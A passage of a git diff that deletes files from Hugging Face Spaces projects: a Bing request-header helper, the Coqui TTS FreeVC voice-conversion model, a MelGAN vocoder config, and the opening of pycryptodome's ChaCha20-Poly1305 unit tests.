'')) ? 
decodeURIComponent(ua!.trim()) : default_ua -} - -export function createHeaders(cookies: Partial<{ [key: string]: string }>, defaultHeaders?: Partial<{ [key: string]: string }>) { - let { - BING_COOKIE = process.env.BING_COOKIE, - BING_UA = process.env.BING_UA, - BING_IP = process.env.BING_IP, - BING_HEADER = process.env.BING_HEADER, - } = cookies - - if (BING_HEADER) { - return extraHeadersFromCookie({ - BING_HEADER, - ...cookies, - }) - } - - const ua = parseUA(BING_UA) - - if (!BING_COOKIE) { - BING_COOKIE = defaultHeaders?.IMAGE_BING_COOKIE || 'xxx' // hf 暂时不用 Cookie 也可以正常使用 - } - - const parsedCookie = parseCookie(BING_COOKIE, '_U') - if (!parsedCookie) { - throw new Error('Invalid Cookie') - } - return { - 'x-forwarded-for': BING_IP || DEFAULT_IP, - 'Accept-Encoding': 'gzip, deflate, br', - 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', - 'User-Agent': ua!, - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - cookie: `_U=${parsedCookie}` || '', - } -} - -export class WatchDog { - private tid = 0 - watch(fn: Function, timeout = 2000) { - clearTimeout(this.tid) - this.tid = setTimeout(fn, timeout + Math.random() * 1000) - } - reset() { - clearTimeout(this.tid) - } -} diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py deleted file mode 100644 index fd53a77fc5c5288883ce329c60114e13569e7126..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/models/freevc.py +++ /dev/null @@ -1,560 +0,0 @@ -from typing import Dict, List, Optional, Tuple, Union - -import librosa -import numpy as np -import torch -from coqpit import Coqpit -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, spectral_norm, weight_norm - -import TTS.vc.modules.freevc.commons as 
commons -import TTS.vc.modules.freevc.modules as modules -from TTS.tts.utils.speakers import SpeakerManager -from TTS.utils.io import load_fsspec -from TTS.vc.configs.freevc_config import FreeVCConfig -from TTS.vc.models.base_vc import BaseVC -from TTS.vc.modules.freevc.commons import get_padding, init_weights -from TTS.vc.modules.freevc.mel_processing import mel_spectrogram_torch -from TTS.vc.modules.freevc.speaker_encoder.speaker_encoder import SpeakerEncoder as SpeakerEncoderEx -from TTS.vc.modules.freevc.wavlm import get_wavlm - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, channels, hidden_channels, kernel_size, dilation_rate, n_layers, n_flows=4, gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__( - self, in_channels, out_channels, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0 - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, 
dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d(initial_channel, upsample_initial_channel, 7, 1, padding=3) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate(zip(resblock_kernel_sizes, resblock_dilation_sizes)): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - 
xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 
15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class SpeakerEncoder(torch.nn.Module): - def __init__(self, mel_n_channels=80, model_num_layers=3, model_hidden_size=256, model_embedding_size=256): - super(SpeakerEncoder, self).__init__() - self.lstm = nn.LSTM(mel_n_channels, model_hidden_size, model_num_layers, batch_first=True) - self.linear = nn.Linear(model_hidden_size, model_embedding_size) - self.relu = nn.ReLU() - - def forward(self, mels): - self.lstm.flatten_parameters() - _, (hidden, _) = self.lstm(mels) - embeds_raw = self.relu(self.linear(hidden[-1])) - return embeds_raw / torch.norm(embeds_raw, dim=1, keepdim=True) - - def compute_partial_slices(self, total_frames, partial_frames, partial_hop): - mel_slices = [] - for 
i in range(0, total_frames - partial_frames, partial_hop): - mel_range = torch.arange(i, i + partial_frames) - mel_slices.append(mel_range) - - return mel_slices - - def embed_utterance(self, mel, partial_frames=128, partial_hop=64): - mel_len = mel.size(1) - last_mel = mel[:, -partial_frames:] - - if mel_len > partial_frames: - mel_slices = self.compute_partial_slices(mel_len, partial_frames, partial_hop) - mels = list(mel[:, s] for s in mel_slices) - mels.append(last_mel) - mels = torch.stack(tuple(mels), 0).squeeze(1) - - with torch.no_grad(): - partial_embeds = self(mels) - embed = torch.mean(partial_embeds, axis=0).unsqueeze(0) - # embed = embed / torch.linalg.norm(embed, 2) - else: - with torch.no_grad(): - embed = self(last_mel) - - return embed - - -class FreeVC(BaseVC): - """ - - Paper:: - https://arxiv.org/abs/2210.15418# - - Paper Abstract:: - Voice conversion (VC) can be achieved by first extracting source content information and target speaker - information, and then reconstructing waveform with these information. However, current approaches normally - either extract dirty content information with speaker information leaked in, or demand a large amount of - annotated data for training. Besides, the quality of reconstructed waveform can be degraded by the - mismatch between conversion model and vocoder. In this paper, we adopt the end-to-end framework of VITS for - high-quality waveform reconstruction, and propose strategies for clean content information extraction without - text annotation. We disentangle content information by imposing an information bottleneck to WavLM features, - and propose the spectrogram-resize based data augmentation to improve the purity of extracted content - information. Experimental results show that the proposed method outperforms the latest VC models trained with - annotated data and has greater robustness. 
- - Original Code:: - https://github.com/OlaWod/FreeVC - - Examples: - >>> from TTS.vc.configs.freevc_config import FreeVCConfig - >>> from TTS.vc.models.freevc import FreeVC - >>> config = FreeVCConfig() - >>> model = FreeVC(config) - """ - - def __init__(self, config: Coqpit, speaker_manager: SpeakerManager = None): - super().__init__(config, None, speaker_manager, None) - - self.init_multispeaker(config) - - self.spec_channels = self.args.spec_channels - self.inter_channels = self.args.inter_channels - self.hidden_channels = self.args.hidden_channels - self.filter_channels = self.args.filter_channels - self.n_heads = self.args.n_heads - self.n_layers = self.args.n_layers - self.kernel_size = self.args.kernel_size - self.p_dropout = self.args.p_dropout - self.resblock = self.args.resblock - self.resblock_kernel_sizes = self.args.resblock_kernel_sizes - self.resblock_dilation_sizes = self.args.resblock_dilation_sizes - self.upsample_rates = self.args.upsample_rates - self.upsample_initial_channel = self.args.upsample_initial_channel - self.upsample_kernel_sizes = self.args.upsample_kernel_sizes - self.segment_size = self.args.segment_size - self.gin_channels = self.args.gin_channels - self.ssl_dim = self.args.ssl_dim - self.use_spk = self.args.use_spk - - self.enc_p = Encoder(self.args.ssl_dim, self.inter_channels, self.hidden_channels, 5, 1, 16) - self.dec = Generator( - self.inter_channels, - self.resblock, - self.resblock_kernel_sizes, - self.resblock_dilation_sizes, - self.upsample_rates, - self.upsample_initial_channel, - self.upsample_kernel_sizes, - gin_channels=self.gin_channels, - ) - self.enc_q = Encoder( - self.spec_channels, self.inter_channels, self.hidden_channels, 5, 1, 16, gin_channels=self.gin_channels - ) - self.flow = ResidualCouplingBlock( - self.inter_channels, self.hidden_channels, 5, 1, 4, gin_channels=self.gin_channels - ) - if not self.use_spk: - self.enc_spk = SpeakerEncoder(model_hidden_size=self.gin_channels, 
model_embedding_size=self.gin_channels) - else: - self.load_pretrained_speaker_encoder() - - self.wavlm = get_wavlm() - - @property - def device(self): - return next(self.parameters()).device - - def load_pretrained_speaker_encoder(self): - """Load pretrained speaker encoder model as mentioned in the paper.""" - print(" > Loading pretrained speaker encoder model ...") - self.enc_spk_ex = SpeakerEncoderEx( - "https://github.com/coqui-ai/TTS/releases/download/v0.13.0_models/speaker_encoder.pt" - ) - - def init_multispeaker(self, config: Coqpit): - """Initialize multi-speaker modules of a model. A model can be trained either with a speaker embedding layer - or with external `d_vectors` computed from a speaker encoder model. - - You must provide a `speaker_manager` at initialization to set up the multi-speaker modules. - - Args: - config (Coqpit): Model configuration. - data (List, optional): Dataset items to infer number of speakers. Defaults to None. - """ - self.num_spks = self.args.num_spks - if self.speaker_manager: - self.num_spks = self.speaker_manager.num_spks - - def forward( - self, - c: torch.Tensor, - spec: torch.Tensor, - g: Optional[torch.Tensor] = None, - mel: Optional[torch.Tensor] = None, - c_lengths: Optional[torch.Tensor] = None, - spec_lengths: Optional[torch.Tensor] = None, - ) -> Tuple[ - torch.Tensor, - torch.Tensor, - torch.Tensor, - Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor], - ]: - """ - Forward pass of the model. - - Args: - c: WavLM features. Shape: (batch_size, c_seq_len). - spec: The input spectrogram. Shape: (batch_size, spec_seq_len, spec_dim). - g: The speaker embedding. Shape: (batch_size, spk_emb_dim). - mel: The input mel-spectrogram for the speaker encoder. Shape: (batch_size, mel_seq_len, mel_dim). - c_lengths: The lengths of the WavLM features. Shape: (batch_size,). - spec_lengths: The lengths of the spectrogram. Shape: (batch_size,). - - Returns: - o: The output spectrogram. 
Shape: (batch_size, spec_seq_len, spec_dim). - ids_slice: The slice indices. Shape: (batch_size, num_slices). - spec_mask: The spectrogram mask. Shape: (batch_size, spec_seq_len). - (z, z_p, m_p, logs_p, m_q, logs_q): A tuple of latent variables. - """ - - # If c_lengths is None, set it to the length of the last dimension of c - if c_lengths is None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - - # If spec_lengths is None, set it to the length of the last dimension of spec - if spec_lengths is None: - spec_lengths = (torch.ones(spec.size(0)) * spec.size(-1)).to(spec.device) - - # If use_spk is False, compute g from mel using enc_spk - g = None - if not self.use_spk: - g = self.enc_spk(mel).unsqueeze(-1) - - # Compute m_p, logs_p, z, m_q, logs_q, and spec_mask using enc_p and enc_q - _, m_p, logs_p, _ = self.enc_p(c, c_lengths) - z, m_q, logs_q, spec_mask = self.enc_q(spec.transpose(1, 2), spec_lengths, g=g) - - # Compute z_p using flow - z_p = self.flow(z, spec_mask, g=g) - - # Randomly slice z and compute o using dec - z_slice, ids_slice = commons.rand_slice_segments(z, spec_lengths, self.segment_size) - o = self.dec(z_slice, g=g) - - return o, ids_slice, spec_mask, (z, z_p, m_p, logs_p, m_q, logs_q) - - @torch.no_grad() - def inference(self, c, g=None, mel=None, c_lengths=None): - """ - Inference pass of the model - - Args: - c (torch.Tensor): Input tensor. Shape: (batch_size, c_seq_len). - g (torch.Tensor): Speaker embedding tensor. Shape: (batch_size, spk_emb_dim). - mel (torch.Tensor): Mel-spectrogram tensor. Shape: (batch_size, mel_seq_len, mel_dim). - c_lengths (torch.Tensor): Lengths of the input tensor. Shape: (batch_size,). - - Returns: - torch.Tensor: Output tensor. 
- """ - if c_lengths is None: - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - if not self.use_spk: - g = self.enc_spk.embed_utterance(mel) - g = g.unsqueeze(-1) - z_p, m_p, logs_p, c_mask = self.enc_p(c, c_lengths) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g) - return o - - def extract_wavlm_features(self, y): - """Extract WavLM features from an audio tensor. - - Args: - y (torch.Tensor): Audio tensor. Shape: (batch_size, audio_seq_len). - """ - - with torch.no_grad(): - c = self.wavlm.extract_features(y)[0] - c = c.transpose(1, 2) - return c - - def load_audio(self, wav): - """Read and format the input audio.""" - if isinstance(wav, str): - wav, _ = librosa.load(wav, sr=self.config.audio.input_sample_rate) - if isinstance(wav, np.ndarray): - wav = torch.from_numpy(wav).to(self.device) - if isinstance(wav, torch.Tensor): - wav = wav.to(self.device) - if isinstance(wav, list): - wav = torch.from_numpy(np.array(wav)).to(self.device) - return wav.float() - - @torch.inference_mode() - def voice_conversion(self, src, tgt): - """ - Voice conversion pass of the model. - - Args: - src (str or torch.Tensor): Source utterance. - tgt (str or torch.Tensor): Target utterance. - - Returns: - torch.Tensor: Output tensor. 
- """ - - wav_tgt = self.load_audio(tgt).cpu().numpy() - wav_tgt, _ = librosa.effects.trim(wav_tgt, top_db=20) - - if self.config.model_args.use_spk: - g_tgt = self.enc_spk_ex.embed_utterance(wav_tgt) - g_tgt = torch.from_numpy(g_tgt)[None, :, None].to(self.device) - else: - wav_tgt = torch.from_numpy(wav_tgt).unsqueeze(0).to(self.device) - mel_tgt = mel_spectrogram_torch( - wav_tgt, - self.config.audio.filter_length, - self.config.audio.n_mel_channels, - self.config.audio.input_sample_rate, - self.config.audio.hop_length, - self.config.audio.win_length, - self.config.audio.mel_fmin, - self.config.audio.mel_fmax, - ) - # src - wav_src = self.load_audio(src) - c = self.extract_wavlm_features(wav_src[None, :]) - - if self.config.model_args.use_spk: - audio = self.inference(c, g=g_tgt) - else: - audio = self.inference(c, mel=mel_tgt.transpose(1, 2)) - audio = audio[0][0].data.cpu().float().numpy() - return audio - - def eval_step(self): - ... - - @staticmethod - def init_from_config(config: FreeVCConfig, samples: Union[List[List], List[Dict]] = None, verbose=True): - model = FreeVC(config) - return model - - def load_checkpoint(self, config, checkpoint_path, eval=False, strict=True, cache=False): - state = load_fsspec(checkpoint_path, map_location=torch.device("cpu"), cache=cache) - self.load_state_dict(state["model"], strict=strict) - if eval: - self.eval() - - def train_step(self): - ... 
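The window arithmetic in `SpeakerEncoder.compute_partial_slices` / `embed_utterance` above is easy to sanity-check in isolation. The sketch below re-implements the same slicing rule in pure Python for illustration only (plain `range` objects instead of `torch.arange` tensors); the extra window covering the final `partial_frames`, which `embed_utterance` appends separately, is not included here:

```python
def compute_partial_slices(total_frames, partial_frames=128, partial_hop=64):
    # Start/stop indices of the sliding windows that embed_utterance
    # feeds to the LSTM before averaging the partial embeddings.
    return [range(i, i + partial_frames)
            for i in range(0, total_frames - partial_frames, partial_hop)]

# A 300-frame mel with the default window/hop yields three windows;
# embed_utterance then appends one more covering the last 128 frames.
slices = compute_partial_slices(300)
print([(s.start, s.stop) for s in slices])  # [(0, 128), (64, 192), (128, 256)]
```

Note that an utterance no longer than `partial_frames` produces no slices at all, which is exactly the case the `mel_len > partial_frames` branch in `embed_utterance` guards against.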
diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py deleted file mode 100644 index dc35b6f8b70891d4904baefad802d9c62fe67925..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vocoder/configs/melgan_config.py +++ /dev/null @@ -1,106 +0,0 @@ -from dataclasses import dataclass, field - -from TTS.vocoder.configs.shared_configs import BaseGANVocoderConfig - - -@dataclass -class MelganConfig(BaseGANVocoderConfig): - """Defines parameters for MelGAN vocoder. - - Example: - - >>> from TTS.vocoder.configs import MelganConfig - >>> config = MelganConfig() - - Args: - model (str): - Model name used for selecting the right model at initialization. Defaults to `melgan`. - discriminator_model (str): One of the discriminators from `TTS.vocoder.models.*_discriminator`. Defaults to - 'melgan_multiscale_discriminator`. - discriminator_model_params (dict): The discriminator model parameters. Defaults to - '{"base_channels": 16, "max_channels": 1024, "downsample_factors": [4, 4, 4, 4]}` - generator_model (str): One of the generators from TTS.vocoder.models.*`. Every other non-GAN vocoder model is - considered as a generator too. Defaults to `melgan_generator`. - batch_size (int): - Batch size used at training. Larger values use more memory. Defaults to 16. - seq_len (int): - Audio segment length used at training. Larger values use more memory. Defaults to 8192. - pad_short (int): - Additional padding applied to the audio samples shorter than `seq_len`. Defaults to 0. - use_noise_augment (bool): - enable / disable random noise added to the input waveform. The noise is added after computing the - features. Defaults to True. - use_cache (bool): - enable / disable in memory caching of the computed features. It can cause OOM error if the system RAM is - not large enough. Defaults to True. 
- use_stft_loss (bool): - enable / disable use of STFT loss originally used by ParallelWaveGAN model. Defaults to True. - use_subband_stft_loss (bool): - enable / disable use of subband loss computation originally used by MultiBandMelgan model. Defaults to False. - use_mse_gan_loss (bool): - enable / disable using Mean Squared Error GAN loss. Defaults to True. - use_hinge_gan_loss (bool): - enable / disable using Hinge GAN loss. You should choose either Hinge or MSE loss for training GAN models. - Defaults to False. - use_feat_match_loss (bool): - enable / disable using Feature Matching loss originally used by MelGAN model. Defaults to True. - use_l1_spec_loss (bool): - enable / disable using L1 spectrogram loss originally used by HifiGAN model. Defaults to False. - stft_loss_params (dict): STFT loss parameters. Defaults to - `{"n_ffts": [1024, 2048, 512], "hop_lengths": [120, 240, 50], "win_lengths": [600, 1200, 240]}` - stft_loss_weight (float): STFT loss weight that multiplies the computed loss before summing up the total - model loss. Defaults to 0.5. - subband_stft_loss_weight (float): - Subband STFT loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. - mse_G_loss_weight (float): - MSE generator loss weight that multiplies the computed loss before summing up the total loss. Defaults to 2.5. - hinge_G_loss_weight (float): - Hinge generator loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. - feat_match_loss_weight (float): - Feature matching loss weight that multiplies the computed loss before summing up the total loss. Defaults to 108. - l1_spec_loss_weight (float): - L1 spectrogram loss weight that multiplies the computed loss before summing up the total loss. Defaults to 0. 
- """ - - model: str = "melgan" - - # Model specific params - discriminator_model: str = "melgan_multiscale_discriminator" - discriminator_model_params: dict = field( - default_factory=lambda: {"base_channels": 16, "max_channels": 1024, "downsample_factors": [4, 4, 4, 4]} - ) - generator_model: str = "melgan_generator" - generator_model_params: dict = field( - default_factory=lambda: {"upsample_factors": [8, 8, 2, 2], "num_res_blocks": 3} - ) - - # Training - overrides - batch_size: int = 16 - seq_len: int = 8192 - pad_short: int = 2000 - use_noise_augment: bool = True - use_cache: bool = True - - # LOSS PARAMETERS - overrides - use_stft_loss: bool = True - use_subband_stft_loss: bool = False - use_mse_gan_loss: bool = True - use_hinge_gan_loss: bool = False - use_feat_match_loss: bool = True # requires MelGAN Discriminators (MelGAN and HifiGAN) - use_l1_spec_loss: bool = False - - stft_loss_params: dict = field( - default_factory=lambda: { - "n_ffts": [1024, 2048, 512], - "hop_lengths": [120, 240, 50], - "win_lengths": [600, 1200, 240], - } - ) - - # loss weights - overrides - stft_loss_weight: float = 0.5 - subband_stft_loss_weight: float = 0 - mse_G_loss_weight: float = 2.5 - hinge_G_loss_weight: float = 0 - feat_match_loss_weight: float = 108 - l1_spec_loss_weight: float = 0 diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py deleted file mode 100644 index 67440d76b5803563de7f1bd32f69c45cd498e2d9..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py +++ /dev/null @@ -1,770 +0,0 @@ -# =================================================================== -# -# Copyright (c) 2018, Helder Eijs -# All rights reserved. 
-# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions -# are met: -# -# 1. Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in -# the documentation and/or other materials provided with the -# distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS -# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE -# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, -# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, -# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT -# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN -# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE. 
-# =================================================================== - -import unittest -from binascii import unhexlify - -from Crypto.SelfTest.st_common import list_test_cases -from Crypto.SelfTest.loader import load_test_vectors_wycheproof -from Crypto.Util.py3compat import tobytes -from Crypto.Cipher import ChaCha20_Poly1305 -from Crypto.Hash import SHAKE128 - -from Crypto.Util._file_system import pycryptodome_filename -from Crypto.Util.strxor import strxor - - -def get_tag_random(tag, length): - return SHAKE128.new(data=tobytes(tag)).read(length) - - -class ChaCha20Poly1305Tests(unittest.TestCase): - - key_256 = get_tag_random("key_256", 32) - nonce_96 = get_tag_random("nonce_96", 12) - data_128 = get_tag_random("data_128", 16) - - def test_loopback(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - pt = get_tag_random("plaintext", 16 * 100) - ct = cipher.encrypt(pt) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - pt2 = cipher.decrypt(ct) - self.assertEqual(pt, pt2) - - def test_nonce(self): - # Nonce can only be 8 or 12 bytes - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=b'H' * 8) - self.assertEqual(len(cipher.nonce), 8) - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=b'H' * 12) - self.assertEqual(len(cipher.nonce), 12) - - # If not passed, the nonce is created randomly - cipher = ChaCha20_Poly1305.new(key=self.key_256) - nonce1 = cipher.nonce - cipher = ChaCha20_Poly1305.new(key=self.key_256) - nonce2 = cipher.nonce - self.assertEqual(len(nonce1), 12) - self.assertNotEqual(nonce1, nonce2) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - ct = cipher.encrypt(self.data_128) - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertEqual(ct, cipher.encrypt(self.data_128)) - - def test_nonce_must_be_bytes(self): - self.assertRaises(TypeError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=u'test12345678') - - def 
test_nonce_length(self): - # nonce can only be 8 or 12 bytes long - self.assertRaises(ValueError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=b'0' * 7) - self.assertRaises(ValueError, - ChaCha20_Poly1305.new, - key=self.key_256, - nonce=b'') - - def test_block_size(self): - # Not based on block ciphers - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertFalse(hasattr(cipher, 'block_size')) - - def test_nonce_attribute(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertEqual(cipher.nonce, self.nonce_96) - - # By default, a 12 bytes long nonce is randomly generated - nonce1 = ChaCha20_Poly1305.new(key=self.key_256).nonce - nonce2 = ChaCha20_Poly1305.new(key=self.key_256).nonce - self.assertEqual(len(nonce1), 12) - self.assertNotEqual(nonce1, nonce2) - - def test_unknown_parameters(self): - self.assertRaises(TypeError, - ChaCha20_Poly1305.new, - key=self.key_256, - param=9) - - def test_null_encryption_decryption(self): - for func in "encrypt", "decrypt": - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - result = getattr(cipher, func)(b"") - self.assertEqual(result, b"") - - def test_either_encrypt_or_decrypt(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.encrypt(b"") - self.assertRaises(TypeError, cipher.decrypt, b"") - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - cipher.decrypt(b"") - self.assertRaises(TypeError, cipher.encrypt, b"") - - def test_data_must_be_bytes(self): - cipher = ChaCha20_Poly1305.new(key=self.key_256, - nonce=self.nonce_96) - self.assertRaises(TypeError, cipher.encrypt, u'test1234567890-*') - - cipher = ChaCha20_Poly1305.new(key=self.key_256, - 